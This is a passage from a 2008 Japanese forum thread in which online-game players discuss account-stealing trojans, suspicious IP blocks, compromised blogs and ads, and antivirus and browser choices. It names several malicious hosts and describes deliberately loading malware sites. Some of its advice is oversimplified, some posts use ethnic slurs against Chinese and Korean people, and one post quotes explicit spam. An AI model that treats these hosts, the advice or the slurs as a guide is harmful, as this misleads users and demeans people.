fujian　longyan(福建省竜岩)の時点で黒だよな。
582 ：既にその名前は使われています：2008/03/20(木) 00:30:29.02 ID:OnDejMT/: FFプレイしてて他は何もしていないはずの時間に
Taiwan　210.201.139.91
China　58.227.193.190

が同時刻に連続して3回づつブロックされてた
IPでぐぐってもこれといって情報なし

とりあえずカスペでオンラインスキャンした後spybotとAVGで今チェックしてるけど
こういうケースは初めてなのでドキドキだ・・・
583 ：既にその名前は使われています：2008/03/20(木) 00:30:36.83 ID:Y/s5aQ5y: 【FF11】カンパニエ将軍集
文字がぼやけてしまったので、詳しく知りたい人は FF11Wikiを見るという事で一つ何とか。
ff11dawda●blog●drecom●jp/
58.22.255.67

中身をのぞいたら記事が特徴あるものだったので文字列で検索したところ
FC2のブログのコピペでした
ブログ主に教えてあげたい気もするのですがFC2のブログを閲覧する勇気は
ありませんでしたよ。
ところで上にもでてた、IEに代わるサファリ？というブラウザは使われた方
いますか？
584 ：既にその名前は使われています：2008/03/20(木) 00:42:20.79 ID:W6rfV4sK: >>582
aguseでは　China　58.227.193.190　はバ韓国（ソウル）って出るね
しかも管理者情報の一部が文字化けのせいなのかぐちゃぐちゃだし
585 ：既にその名前は使われています：2008/03/20(木) 00:47:33.93 ID:OnDejMT/: ひとまず何も検出されなかったけど
なぜブロックしてたのか原因がわからないと不安になりますね
しばらくフレに財産預けておこうかなあ・・・
586 ：既にその名前は使われています：2008/03/20(木) 01:34:23.30 ID:b6mh7+a7: ノートンってそんなに駄目なのか？
ノートン入れてるし大丈夫だろうと普通にブログ見まくってたけど不安になってきた
587 ：既にその名前は使われています：2008/03/20(木) 02:49:08.39 ID:mzVwwhZt: ノートンはどっちかというとアンインスコ時のしぶとさに定評があるというか悪評があるね
とりあえずFF関係でネットサーフィンするならPG2も併用するよろし
588 ：既にその名前は使われています：2008/03/20(木) 04:45:28.71 ID:fbUC1hEa: >>586
アドオンパック入れて、パスワードの一部かPOLIDの一部を登録して
不意に送信されそうになったとき警告＆ブロックされるようにしてる
・・・がこれでいいかは不安ｗ
589 ：既にその名前は使われています：2008/03/20(木) 04:50:30.57 ID:ze+Z3M4L: >>588
それはブラウザから送信されるデータを監視する機能だと思う
だとすれば、パス抜きマルウェアはブラウザを使うことなく
独自にデータを送信するから残念ながら流出はブロックされない
590 ：既にその名前は使われています：2008/03/20(木) 05:02:00.69 ID:fbUC1hEa: >>589
ブラウザ以外ではメッセンジャーとメールのプロトコル？は検知するようだ
でも独自アプリのスパイウェアを考えると効果は薄そうだ・・・
ブラウザで罠スクリプト呼ばれたときは効くから無いよりはいいが
591 ：既にその名前は使われています：2008/03/20(木) 05:05:54.72 ID:ze+Z3M4L: >>590
残念だけど、罠スクリプトには効果ないよ
592 ：既にその名前は使われています：2008/03/20(木) 05:27:35.74 ID:fbUC1hEa: >>591
そうか、、、なんか別の対策も考えてみよう
ありがとね
593 ：既にその名前は使われています：2008/03/20(木) 05:56:41.66 ID:bZqdq9WU: >>585
勝手な予想だけど、
過去に見た業者のWEBサイト等にアクセスログが残ってて、
業者がログにあるIPアドレスに、無差別にアクセスしようとしてるだけ
じゃないかね。
それで、アクセスしたPCにセキュリティホールがあれば、何か仕込むとかする。
なので、ウィルスに感染してなくても >>582 みたいなことは起こると思う。

動的IPの場合には、IP変われば、とりあえず問題ないけど、
固定IPの場合は、業者があきらめるまで狙われるから、今後も
ブロックするようにしていたほうが、安全だと思う。
594 ：既にその名前は使われています：2008/03/20(木) 06:32:55.80 ID:1K9QRugO: >>583
俺の大学の教授がmacオタで研究室にmacしかなくて泣く泣く使ってたんだけど、
そんとき入ってたブラウザがSafariだった。macの標準とかなのかな？
デザインはitunesと同じ感じ。先日試しに入れてみたんだけど表示が全部英語で俺涙目ｗｗｗ
…と思ったらつい一昨日メニューも日本語版のやつが出たんだな…ちょっと入れてくる
文字がmacチックで（ｱﾝﾁｴｲﾘｱｽ処理が激しい）windowsユーザーは最初慣れないかも
設定ではポップアップブロック,plugin,java,javascript,cookieのオンオフができる
見たところIframeのオンオフはなかった
595 ：既にその名前は使われています：2008/03/20(木) 08:06:48.52 ID:fFVD+6yv: Safar3.1はAcid3テストでFirefox4alphaを上回るスコアを出している。
…なんてことはどうでもよくて、割と平然と罠を踏めるブラウザとして使ってるｗ
(IEとかは普段用にいろいろてんこ盛りにしてるので)。
596 ：既にその名前は使われています：2008/03/20(木) 10:10:02.31 ID:MrQLGMCI: >>594
SafariはApple純正のMac標準ブラウザ。
Windows版も出てきたね。
WinでいうところのIEってところだね。
俺も英語版のをWin版Safariを試しに使ってみてたけど
日本語表示はできてたけど、日本語入力ができなかったんで
あきらめてたところ。
日本語版も出たならさっそく入れてみるわｗ
情報ありｗ

>>573
そかな。
死にたくない人はチベットやイラクにはいかないのと同じで、
感染したくない人はWindowsを使わない、
こういう考え方ってセキュリティの最も基本的な考え方だと思ってたけど。
それともなにか？
おまえはイラクにだって防弾キョッキ着て旅行すれば問題ない、と思う人か？ｗ
597 ：既にその名前は使われています：2008/03/20(木) 10:17:00.36 ID:MrQLGMCI: >>553
>みんながみんなMacやFF専用PCもってりゃいいけど、そうでもないでしょ。

Mac1台あればFF専用PC買う必要ないけどね。
最近のMacはWindowsもnative起動するから。
ちなみにおれはMacBook Proを1台だけ持ってて、
普段はMacで起動して仕事。
FFするときだけWindowsで起動して遊んでるよ。
598 ：既にその名前は使われています：2008/03/20(木) 10:26:31.37 ID:wn95jAj+: うちもIntel MacでWindowsとOSXを切り替えてつかってる。
他にパラレルズ使ってXP起動させてFFやろうとも考えたけど
ポリゴン表示がえらいことになるから使えんｗ
バグなのかうちだけの問題なのかよくわからんのだけども
599 ：既にその名前は使われています：2008/03/20(木) 10:27:33.34 ID:dhA8mwh3: こいつが>>546が言ってる皮先かｗ
600 ：既にその名前は使われています：2008/03/20(木) 10:32:51.65 ID:MrQLGMCI: >>589
ちょっと話が脱線気味なんでこれでこの話題は最後に駿河、
ParallelsでFFはさすがに無理だよｗ
俺もParallelsいれているけどFFは無理だった。
素直に再起動してWinでnative起動した状態でFFやれ。
>>599
そうそう、よくわかったねｗ　おりこうちゃんｗ
601 ：既にその名前は使われています：2008/03/20(木) 10:32:53.69 ID:wn95jAj+: 所でSafariの新しいバージョンはFirefoxと比較して安全なのかな？
使ってみたけど、いまいちよくわからんｗ
602 ：既にその名前は使われています：2008/03/20(木) 10:34:10.86 ID:MrQLGMCI: >>601
どれ、なら今からちょろっとWin版Safariで地雷踏んでみるわｗ
報告は本日夕方以降になるかも。
603 ：既にその名前は使われています：2008/03/20(木) 10:34:45.19 ID:wn95jAj+: >>600
やっぱパラレルズは駄目かーｗ
チャットくらいなら出来るんだけど、キャラがねぇ・・
ありが㌧ｗ
604 ：既にその名前は使われています：2008/03/20(木) 10:36:05.85 ID:3D4GO1VT: >>597
Winのゲームやるのに、Mac買うやつなんて希少種だから
対策案としては下策だな
605 ：既にその名前は使われています：2008/03/20(木) 13:18:18.72 ID:wn95jAj+: ∠(@O@) ﾋﾞｼｯ!
606 ：既にその名前は使われています：2008/03/20(木) 13:43:52.74 ID:+Ux7YVKL: 今はチベット支援団体にウイルスメールが大量に送りつけられてるそうだ。
さすが中国と言わざるを得ない

ところでsafariも普及すれば必ず脆弱性を見つけて狙われると思う。
607 ：既にその名前は使われています：2008/03/20(木) 13:53:15.50 ID:h12bDMTI: >>606
中華らしいな…
あいつら数に物言わせての団体行動は得意だからな。
今の中国って、世界一の洗脳教団だよなー
608 ：既にその名前は使われています：2008/03/20(木) 13:54:42.42 ID:dUG+KiwF: そして指摘されると「証拠もなしにいい加減なことを言うなアル。これは日帝・アメリカの陰謀アル」
609 ：既にその名前は使われています：2008/03/20(木) 13:54:43.32 ID:xQHWspxW: 4000年の文化、歴史があるとか誇ってるくせに
他国の文化はまったく無視でパクルしな
610 ：既にその名前は使われています：2008/03/20(木) 13:55:28.12 ID:dUG+KiwF: 4000年前の歴史しかすがる物が無いしな。
611 ：既にその名前は使われています：2008/03/20(木) 13:59:13.19 ID:qwMPlUsj: 俺小さい頃　中国3000年の歴史って言ってた気がするんだよなぁｗ
10年で1000年増えるとはすごい国ですね＾＾
612 ：既にその名前は使われています：2008/03/20(木) 14:17:27.20 ID:XtaX82rM: 数がいつの間にか倍増するのが支那クオリティｗ
613 ：既にその名前は使われています：2008/03/20(木) 14:40:45.43 ID:D4ylaxkd: FFAHのフォーラムより抜粋

By 無名 2008-03-19 02:16:48

今はないようですが、19日17時頃、トップページのサーバーランキングのところに危険URL？へ
アクセスするインラインフレームが埋め込まれていました。
wowinterfcae.comというサイトですが、詳しい方いましたら教えてください。

By Lakshmi.Jaerik 2008-03-19 14:47:28

一昨日、１時間ぐらいの間に、アドネットワーク(Tribal Fusion）からのトップフレームの広告に
危なさそうな１pxインラインフレームがあったようです。
ユーザから報告来たところで、我々管理人がアドをブロックしました。

---
広告にirframe埋め込めるのか。
広告も本格的にヤバくなってきたのかもしれんなー
614 ：既にその名前は使われています：2008/03/20(木) 14:40:59.52 ID:g5yaSyJ0: >>611
３千年だったなｗ
615 ：既にその名前は使われています：2008/03/20(木) 14:42:11.95 ID:7fSfV05v: ちょうど四捨五入にあたったんじゃね？
616 ：既にその名前は使われています：2008/03/20(木) 14:46:14.71 ID:oOuEsog5: 否、3001年になったとこで切り上げだろ
617 ：既にその名前は使われています：2008/03/20(木) 16:32:29.92 ID:IlhcSNTO: >>613
広告にトロイ載せる？マジで？無料スペース全部駄目になるじゃんw
ッて言うか企業ページの広告もやばいのか？www
618 ：既にその名前は使われています：2008/03/20(木) 17:23:15.68 ID:h12bDMTI: >>613
あーなるほど。f2cもそれかもなー、とは思ってたんだわ。
いや、ウイルスが発生したタイミングって、実はf2cのブログの仕組みが代わって直ぐのタイミングだったんだわ。
ただ、f2c内で広告が出るタイミングは、ブログ更新サボってから一月で…ってスクリプトだから、そこもいじられてる可能性あるけどな…
619 ：既にその名前は使われています：2008/03/20(木) 17:40:54.70 ID:yYznPb3e: >>617
613のはやられた感じがしないでもない。
運営管理者が意図しないものみたいだしな。

中華が金を払ってヤフーにオーバーチュア広告に広告申請をして罠を仕込んだ事例はある。
リネ資料室の感染源サイトページにも事例出てるしな。
約3年ほど前の事例だが
http://ime.nu/lineage.nyx.bne.jp/misc/security/id_virus-site.html#JPLOVE888
http://ime.nu/lineage.nyx.bne.jp/misc/security/id_virus-site.html#INFO

613のやつのWHOIS、福建は福建だが、湖南省アモイ市とかでたらめに書いてるみたいだね。
Domain name: wowinterfcae■com
Fujian province,Xiamen City　(福建、アモイ)
Xiamen Hunan 100084　(アモイ、湖南）
Created: 2007-11-24
620 ：既にその名前は使われています：2008/03/20(木) 18:11:23.98 ID:+rg0XH3o: >>606
>ところでsafariも普及すれば必ず脆弱性を見つけて狙われると思う。

この議論はもう聞き飽きたよ。そんな当たり前のことを繰り返すな。
日本も攻撃を受ければ、イラクよりひどい目にあるだろうね。
だけど、現状、日本は攻撃されてないので安心して暮らせる。
要するに、「今安全なところ」に住めばいいだけの話だろ。
池沼かよｗ
621 ：既にその名前は使われています：2008/03/20(木) 18:44:03.10 ID:IlhcSNTO: >>620
防備を怠るな、ッて話じゃないの？

>>619
あ～有るね、スポンサーサイト枠。
前FF11狙いで「花のしずく」ってのもあったと思う。
622 ：既にその名前は使われています：2008/03/20(木) 19:13:46.01 ID:qwMPlUsj: 花の雫とか懐かしいなーｗ
623 ：既にその名前は使われています：2008/03/20(木) 19:32:23.26 ID:0ozGWzos: age
624 ：既にその名前は使われています：2008/03/20(木) 21:21:20.73 ID:Smk0S4TY: >>620
「今安全なところ」に住むだけじゃ足りない。
625 ：既にその名前は使われています：2008/03/20(木) 21:33:13.56 ID:oOuEsog5: 竜スレより
407 名前：おすすめ２ちゃんねる[] 投稿日：2008/03/20(木) 21:21:56.03 ID:gyNVpam+
2008年2月のMVP 『わるきゅ～れ』吸尻鬼～アナル姫肛姦調教録～

◆ひたすらにアナルを犯し、尻穴を責め続ける肛姦アドベンチャー！
　エロ発信基地「わるきゅ～れ」がお送りする卑猥なケツ穴物語！
　それはプレイヤーのアナル属性の有無に関わらず射精必至！
　エロく無ければエロゲーじゃない！
◆調教時には『調教モード』に突入し、行いたいアナルプレイを選択！
　それまでの行動によって出現調教変化！
　全てのアナルプレイを見るまでには貴殿の肉棒は淫狂い！

ダウンロード:URL省略最後が.rar

俺のコーヒーミルク返せｗ
626 ：既にその名前は使われています：2008/03/20(木) 21:43:44.41 ID:fFVD+6yv: エロ狙いも前からあるねぇ。
ネトゲプレーヤとあまり層がかぶらない気もするけど
エロは判断能力を低下させる(振り込め詐欺とか)。
下手な鉄砲数撃ちゃ…だ。

ところでFC2ブログをハックしまくったhellh■net(dda3■netと同一犯)が
新型をばら撒いている模様。注意されたし。
Kaspersky・Dr.WEBが撃墜、AntiVirもすぐ対応すると返答あり。
627 ：既にその名前は使われています：2008/03/20(木) 21:47:03.89 ID:RpUvx5fd: >>624
まぁしかし安全なところに住むってのは
確かにセキュリティうんぬん以前の基本ではあるなｗ
おれもMac検討してみるか。
最近のMacはWinも起動できるとは知らんやったわｗ
進化したもんだな。
628 ：既にその名前は使われています：2008/03/20(木) 22:30:02.13 ID:h12bDMTI: >>627
そしてウイルスにあって涙目になる訳か…

そもそも、被害報告がない＝ウイルスに会わない。
って形はそうそうならない。
単に人口が少なくて、被害が外に繋がりにくいって事もあるからな。
ほら、人口を減らしまくって情報が伝わりにくい国が隣にあるじゃまいか…

後、MACでFF出来たっけ？
俺そんな話し聞いた事ないんだが…ちとググってみるか。
629 ：既にその名前は使われています：2008/03/20(木) 22:38:36.48 ID:lf5ar/Sq: 垢ハック恐れてMacなんか使っても無駄だ。
Windowsで起動してる間はMacOSとか関係なくて
Apple制のPCでWindowsが起動している感じ。
大体みんなFF窓モードとかにして遊んでる間にブラウザ起動して遊びながらウェブみたりしてるわけだろ。
その時にウィルス踏んだら普通に感染するぜ、つまり今までと同様の対策は必要。
MacOSでのネットサーフィンからだと確かにWindows向けのウィルスには掛からない、そう言う意味では安全だ。
だけれど、ネット見ようと思うと再起動が必要だ、遊んでる時に再起動なんて出来ない。
それと普段のネット見るためにMacOSからってんならそれはそれで良いが、実際切り替え結構めんどうだぞ。
Windowsで起動しっぱなしになれば益々Mac使ってる意味なんてなくなるぜ。
漏れは好きでMac使ってるけど、Macに興味も無い人間がOS使っても使い慣れなくて使いにくいだけだ。
630 ：既にその名前は使われています：2008/03/20(木) 23:01:37.62 ID:lf5ar/Sq: >>628
Apple制PCにWindowsをインストールすることは出来るが(パーティションを切るか別HDDを用意する必要アリ)
MacOSを使ってFFを起動させる事は不可能。

ちなみに、MacOSはNTFSでフォーマットされた物を見る事は出来るが書き込む事が出来ないので
MacOS起動中はWindowsパーティションはほぼ100%安全。
でもFAT32でフォーマットされてるとMacOS側からも書き込み可能なので注意。
それとWindowsはMacOSのフォーマット方式に対応してないので、
Windows起動中はMacが入ってるパーティション/HDDは感知できず無いも同然の状態になってる。

前々から書いてるけど、Macとかよりもネットブラウジング専用の仮想環境を用意汁。
631 ：既にその名前は使われています：2008/03/20(木) 23:04:04.15 ID:3J0OuW6b: このスレ「mac」という文字列をNGワードにすると
レスが半分消えるから不思議だ。
632 ：既にその名前は使われています：2008/03/20(木) 23:38:09.06 ID:Dbks/4Bn: 価格.comのAbeeの電源の口コミに、Abeeのカスタマーセンターの人が書き込みしてたのと同じだな。
Macの社員がMacを勧めてるだけみたいなｗ

↓以前リネ２のパス抜き？だったかでハックされた事もあるサイトなので、見たい人は自己判断で。
bbs.kakaku.com/bbs/05900310887/#7411423
633 ：既にその名前は使われています：2008/03/20(木) 23:44:45.92 ID:dUG+KiwF: >>630
CDブートのLINUXとかあったきがするな。
それでいい？
634 ：既にその名前は使われています：2008/03/20(木) 23:48:56.15 ID:zppKAgFE: >>633
それだと、>>630の言いたいことが、全然理解できてないかと(´・ω・｀)
635 ：既にその名前は使われています：2008/03/20(木) 23:51:11.67 ID:TJhJD7BS: おろ？
日付変わってないのに、IDかわっとる(´・ω・｀)？
636 ：既にその名前は使われています：2008/03/20(木) 23:57:18.07 ID:TJhJD7BS: 保守ついでに、もっかいID確認
ちなみに、今日書き込んだのは、624,634,635。
637 ：既にその名前は使われています：2008/03/21(金) 01:16:17.81 ID:qvKGW0z3: にゃあにゃあ
Safari使えば、IEだと感染するトロイや罠JavaScript,ActiveXみたいのを含んだサイトを踏んでしまっても平気ですか？
それともSafari使っても感染するときはする？
ちょっと誰かSafariで罠サイト踏んでみて報告してほしいニャ
638 ：既にその名前は使われています：2008/03/21(金) 01:46:06.63 ID:Wpx8UETa: 大丈夫だったよ。
639 ：既にその名前は使われています：2008/03/21(金) 02:00:33.02 ID:pwHVDVfR: >>637
IE固有のセキュリティホールを突いてるやつなら、IE以外のブラウザを使えばおｋ
それ以外なら、どのブラウザ使っても一緒。
基本的にSafariだろうがFirefoxだろうが危険度ではIEと変わらんと思ってるので、
使い慣れたスレイプニル(IEとエンジン一緒ｗ）をIEエンジンorGekkoエンジン切り替えで使ってる。
ま、WEBブラウズ自体をそれ専用PCにはしてるがね。
それでも100%安全とはいえないが、やらないよりはマシって程度。
100%安全っていえるのは、PC使わないってことじゃねｗ

感染しても大丈夫な専用PC（感染してもクリーンインスコで無問題）用意するか、
それが無理なら630がしつこく言ってる仮想環境用意するのが良いと思う。

Mac&Safariなら安全とか思うのは、間違いよ。
640 ：既にその名前は使われています：2008/03/21(金) 02:39:36.93 ID:7lxfS9dH: >>633
俺はまさにそのKnoppix使っている。フリーのCDイメージを落として焼くだけ。
メジャーなチップを使っているならほぼ認識してくれる。
操作系もほぼWinに似せてあるしな。FF退役PCなら余裕で動く。

unit.aist.go.jp/itri/knoppix/
641 ：既にその名前は使われています：2008/03/21(金) 02:48:53.45 ID:IEw5PmDY: CDからブートできるLinux系OSならセリオってのもあったなそういや

にしてもマカーがここまでウザいとはｗ
642 ：既にその名前は使われています：2008/03/21(金) 04:33:50.31 ID:mSf8OHwM: まかーの印象が悪くなるから止めて欲しいんだが。まじで。
どうせ漢字トークもしらないにかわだろうが。
643 ：既にその名前は使われています：2008/03/21(金) 04:33:57.40 ID:IhsAYsf1: バウー
644 ：既にその名前は使われています：2008/03/21(金) 04:34:46.37 ID:IhsAYsf1: >>642
おい、保守しようと思った俺が馬鹿みたいじゃないか
645 ：既にその名前は使われています：2008/03/21(金) 07:02:43.38 ID:qvKGW0z3: Linuxで2chブラウザ動くのだろうか
Janeが無いとかなり困るのだが・・・
646 ：既にその名前は使われています：2008/03/21(金) 07:49:53.97 ID:cmlEh2ds: >>645に入ってるキーワード2つでググるとあっさり答えが見つかることを何故
わざわざここで聞くんだ？
647 ：既にその名前は使われています：2008/03/21(金) 08:17:13.54 ID:IHmXpTvm: ﾎｼｭするお！
648 ：既にその名前は使われています：2008/03/21(金) 08:37:58.28 ID:R0toWM91: PG2導入しようと思ったがリストの追加がわからんかった・・・
649 ：既にその名前は使われています：2008/03/21(金) 08:43:21.39 ID:qbd4kBrz: とりあえず
・パスワード手動化
・avast
・spybot
を導入

FWは昔からKerio使ってる
こんなもんかなぁ
650 ：既にその名前は使われています：2008/03/21(金) 09:01:17.31 ID:YMsAeZ16: >>648
リネージュ資料室でググる
FFXI中心でこんなところも
ttp://miku.a.orn.jp/miku6/faq.html

ふむのが怖ければ「pg2 ffxi」でググればトップにでる
651 ：既にその名前は使われています：2008/03/21(金) 09:58:59.10 ID:R0toWM91: >>650
理解した。
導入完了したしノートン先生の完全スキャンもしたしPOLパスも変えた。
いや、怪しいURL踏んだとかしてないけど一応やっといて損はないでしょうしね～。
あとはブラウザか・・・IE7に慣れてしまったせいかどのブラウザ使っても違和感が｡・ﾟ・(ノД`)・ﾟ・｡
652 ：既にその名前は使われています：2008/03/21(金) 10:19:07.54 ID:qBPgZsZN: >>651
IE7なら良いよ
設定しだいだけどさ
どのブラウザだろうが意識の問題だ
653 ：既にその名前は使われています：2008/03/21(金) 10:28:39.61 ID:1xWKYoqc: PG2入れるとwin終了遅くなんない？
654 ：既にその名前は使われています：2008/03/21(金) 11:02:09.23 ID:YMsAeZ16: >>653
常駐させてれば、当然終了時にプログラム終了の手間があるから遅くなるわな

ただ、その数秒終わるのが遅くなるのと、安全と、どちらをとるか、と言うこと
655 ：既にその名前は使われています：2008/03/21(金) 11:04:26.81 ID:IM7Hih85: PG2てのは他のファイアウォールと共存させても大丈夫？
ぐぐってもどうもよく分からん
656 ：既にその名前は使われています：2008/03/21(金) 11:23:20.03 ID:YMsAeZ16: >>655
共存は出来そうだが、日本語版の説明だとマカフィーとBlackICEってとこのとは
相性が悪いらしい
657 ：既にその名前は使われています：2008/03/21(金) 12:30:13.27 ID:PmBerChw: 保守
658 ：602：2008/03/21(金) 12:57:49.93 ID:yR7Am9/m: Win版Safariでこのスレに貼ってある危険なURLを
ふんでみました。
もちろんF-secureで完全防備した上で。

結果は、ウイルスてかワームかな？が
ちゃんとF-secureで捕獲されまくりますた！ｗ
例えば、JS/Agent.CGとかいうやつだったかな。
ま、よ～するに、Win版のSafariもやっぱダメってことでｗ

ちなみに当然のことながらMac版のSafariなら
このスレの危険URLを踏みまくっても全然平気ｗ
おもろいから踏みまくってやったわ。
659 ：既にその名前は使われています：2008/03/21(金) 13:11:37.04 ID:BlGE/mNF: おまえの前世はアメリカの安っぽいドラマとかで余計なことをして最初に死ぬヤツに違いない
660 ：既にその名前は使われています：2008/03/21(金) 13:16:17.28 ID:YMsAeZ16: とりあえず誰か>>602を要塞の焼却炉に捨ててきてほしい

こんなんじゃ、まともなMac使いがかわいそうだ
661 ：既にその名前は使われています：2008/03/21(金) 13:22:42.03 ID:JX2kFnn1: JS/AgentCGってのはindex.htmファイルなんだから
どんなブラウザだろうと読み込もうとするし
ウイルス対策ソフトいれてればMacでも検知するって＾＾；

Win向けだろうがMac向けウイルスだろうが検知するのが
真っ当なウイルス対策ソフトだ
662 ：既にその名前は使われています：2008/03/21(金) 13:27:57.44 ID:yR7Am9/m: >>660
洋裁の焼却炉・・・・。行きたいんだけど、
なかなか行けないよね。
>>649
good job!
パスワード手動化したのはセキュリティ面で大きいだろうね。
663 ：既にその名前は使われています：2008/03/21(金) 13:32:32.04 ID:JX2kFnn1: >>662
DAT落ちしたがリコポディウムを植えるスレの8を嫁ばシアワセになれるんだぜ
googleキャッシュ
ttp://209.85.175.104/search?q=cache:8ZzBEF1maBcJ:live27.2ch.net/test/read.cgi/ogame/1205772617/-100+%E3%83%AA%E3%82%B3%E3%83%9D%E6%A4%8D%E3%81%88%E3%82%8B%E3%82%B9%E3%83%AC&hl=ja&ct=clnk&cd=1&lr=lang_ja
664 ：602：2008/03/21(金) 13:37:36.19 ID:yR7Am9/m: >>661
そうなんだｗ
けどMacの中にWin専用マルウェアが入り込んだとしても
ただのデータファイルでしかないわけだから、
それはマルウェアとは言えないのじゃないのかな。
こんな俺でも1年くらい前まではMacでもちゃんと
ウイルス対策してたよ。Virexっていうやつで
週1回くらいはスキャンしてた。
だけど見つかるのはWindows専用ウイルスばっかだし
あんかアフォらしくなってもうやめた、という経緯がある。
665 ：既にその名前は使われています：2008/03/21(金) 13:40:57.37 ID:yR7Am9/m: >>663
ほぉ！　こりゃ便利だねｗ
ついこないだフレに要塞で白AFのカギとりを
手伝ってもらって3日がかりでやっとゲトしたんだけど、
箱もアルタナ入れたらとりやすいよ、とのことで
早速おとといボチっとしたんだけど、
焼却炉クエにも使えそうな悪寒がするよｗ
666 ：既にその名前は使われています：2008/03/21(金) 13:43:31.93 ID:HsHAqqq0: 家の中でルーターに２台のパソコンを繋いでいて
一台はＦＦ専用、もう一台はＦＦ以外用の場合
ＦＦ以外用のやつが感染したらＬＡＮケーブル伝ってウイルス移ってくるものなのかな？
667 ：既にその名前は使われています：2008/03/21(金) 13:48:05.45 ID:yR7Am9/m: >>666
ルータ内同士のパソコン間では当然感染する。
ただし「ＦＦ以外用」のパソコンがLinuxなどなら
ＦＦ専用Winマシンには感染しない。OSが違うから。
668 ：既にその名前は使われています：2008/03/21(金) 14:00:16.84 ID:HsHAqqq0: >>667　トンクス
今度ＰＣを新調するからそれをＦＦ用にして、
今使用中のＰＣをＯＳ再インストしてからネット等に使おうと思ってたんだが
ウイルス対策にはならんか～・・。両方ともｘｐだし。
669 ：既にその名前は使われています：2008/03/21(金) 14:00:36.44 ID:A8aOrR6N: うちルーター経由で４台繋いでる（家族１人１台PC持ってるから）
全部にウィルス対策ソフト入れて、
FFやってるPCではネットしてない、PG2とスパイボット入れてあるけど

全部winだからルーター経由ってのヤツに感染したらダメぽ・・・・orz
670 ：既にその名前は使われています：2008/03/21(金) 14:03:32.69 ID:A8aOrR6N: >だけど見つかるのはWindows専用ウイルスばっかだし

mac用のウィルス作るコトって、
ベータビデオユーザー向けソフト作るぐらい
一般的じゃないからね
671 ：既にその名前は使われています：2008/03/21(金) 14:03:51.96 ID:yR7Am9/m: MacOSXでもウイルス対策は必要ということは
よくわかりました。
俺はMacBook ProでFFをやってるので
WindowsパーティションにはF-secureを入れています。
だけど、Macパーティションには入れてませんでした。
そこで、いろいろとMac用のセキュリティソフトを
探してみましたが、悪徒2とかノートンとかマカフィーとか
あんまりいい噂を聞かないところのソフトしかないようで
がく然としました。
けど、これはなかなか良さそうです。
さっそくインスコしてみました。
ClamXav
ttp://www.clamxav.com/index.php?page=dl
また後日談をお話ししますね。
672 ：既にその名前は使われています：2008/03/21(金) 14:07:14.10 ID:yR7Am9/m: >>668
まぁしかしネットワーク上から直接入り込むタイプのワームは
（要するにサーバを攻撃するタイプね）
一度ルータ越えをしないと感染しないんで、
ルータがしっかりしたものを使っていれば
あんまりきにしなくてもいいかもしれんけどね。
ルータがバッキャローとかコレガとかはダメよｗ
673 ：既にその名前は使われています：2008/03/21(金) 14:09:24.05 ID:JX2kFnn1: Clamアンチウイルスは興味深い試みだが･･･
利用者はがんばって検体提出をして欲しいぜ。
674 ：既にその名前は使われています：2008/03/21(金) 15:16:23.45 ID:yt0VNls8: >>671
ClamAVは群雄割拠のWindowsのアンチウイルスから見た場合は
正直言ってウンコなんだが、それでもMac専用で最も売れている(※)
VirusBarrierよりマシらしい。
ま、Macの市場規模相応に、ロクなウイルスは無いが
ロクなアンチウイルスもまた無いということだろう。

※BCNランキングより俺調べ。専用ではない場合はNortonがとりあえず首位。
ttp://bcnranking.jp/category/subcategory_0019.html
675 ：既にその名前は使われています：2008/03/21(金) 15:26:30.80 ID:yt0VNls8: >>673
ClamAVは原則お1人様1日2ファイルまで(※)というステキなベンダーだ。
ボランティアみたいなオープンソースなので単純にマンパワー不足なんだろうけど
日本向けだけでも1日2桁投下されるネトゲ中華トロイに対応できないのは明白。

※ ttp://cgi.clamav.net/sendvirus.cgi
>please do not submit more than two files per day.
676 ：既にその名前は使われています：2008/03/21(金) 15:35:15.73 ID:PmBerChw: 垢ハックトロイではないけれど

F1マレーシアグランプリの公式サイトが乗っ取られる、F-Secure報告
ttp://internet.watch.impress.co.jp/cda/news/2008/03/21/18894.html

マレーシアグランプリのサイト（www.malaysiangp.com.my）にアクセスしようとしたところ、
「Hijack by CuciOtak」という文字と洗剤のパッケージのような画像が表示されることを発見。
調査したところ、DNS情報が書き換えられたことによって別のサーバーに誘導されており、
公式サイトのIPアドレスでアクセスした場合には正常な内容が表示されたという。
677 ：既にその名前は使われています：2008/03/21(金) 15:39:13.87 ID:miUzx6dO: どっかのDNSサーバがクラックされたってこと？
それが出来るってヤバくね？
678 ：既にその名前は使われています：2008/03/21(金) 15:41:13.83 ID:cmlEh2ds: >>677
この手は昔からあるな
679 ：628：2008/03/21(金) 15:42:43.84 ID:+u+X8c/Z: >>630
にゃるほど。
その仕様なら、MacにFFはお勧め出来ないか…
それじゃ、Macを禁止ワードに入れるかー
正直うざくなってきた。
680 ：既にその名前は使われています：2008/03/21(金) 16:52:05.37 ID:HsHAqqq0: セキュリティ板みてるとカスぺってネトゲとかの通信速度が大事なことには不向きなのかな？

このスレ見てカスぺ買おうかと思ってあっちの板もみてたんだが。
新ＰＣ用にバスター買って来てあるんだが、この前の不祥事だし・・。
681 ：既にその名前は使われています：2008/03/21(金) 16:54:19.19 ID:e1/zBgkd: 裏で釣り役とかリンバスで赤とかソロで竜とかやってるが、
カスペ使ってて致命的な遅れが出たってことはないなー

それこそFPSのｽﾅｲﾎﾟでもないかぎり大丈夫じゃね？
682 ：既にその名前は使われています：2008/03/21(金) 16:55:51.23 ID:LbI9Zv4m: >>680
カスペの設定で早くできる
有名な事柄だからぐぐりゃどうすればいいかでてくるはず

＠体験版あるから迷うなら使ってみて決めればいい
683 ：既にその名前は使われています：2008/03/21(金) 17:00:01.54 ID:cnnEuYmq: 上げてくぞー
684 ：既にその名前は使われています：2008/03/21(金) 17:17:42.39 ID:yt0VNls8: >>680
軽く見せるためにデフォルト設定スッカスカの製品とは違って
カスペはデフォでガチガチなんすよ
(んでFWのリークテストではアンチウイルス付属FWとしてはトップ)。
いらんもん外していく感じ。
685 ：既にその名前は使われています：2008/03/21(金) 17:45:10.18 ID:yt0VNls8: げんなりするような新型
ttp://www.virustotal.com/analisis/ac9b75b1bfca82b29a5801da2ff0aa36
捕獲はDr.WEBとMicrosoft(笑)
686 ：既にその名前は使われています：2008/03/21(金) 17:46:01.02 ID:JX2kFnn1: MSなめんなよ＾＾；
687 ：既にその名前は使われています：2008/03/21(金) 18:32:01.88 ID:Szk/ZRWB: トレンドマイクロのWeb改竄、ウイルス感染の恐れは6ページのみ
http://ime.nu/internet.watch.impress.co.jp/cda/news/2008/03/21/18898.html
688 ：既にその名前は使われています：2008/03/21(金) 19:03:26.42 ID:OZ8DztAT: >>671です。
C l a m X a vでローカルを検索かけると、
こんなに見つかりましたｗ
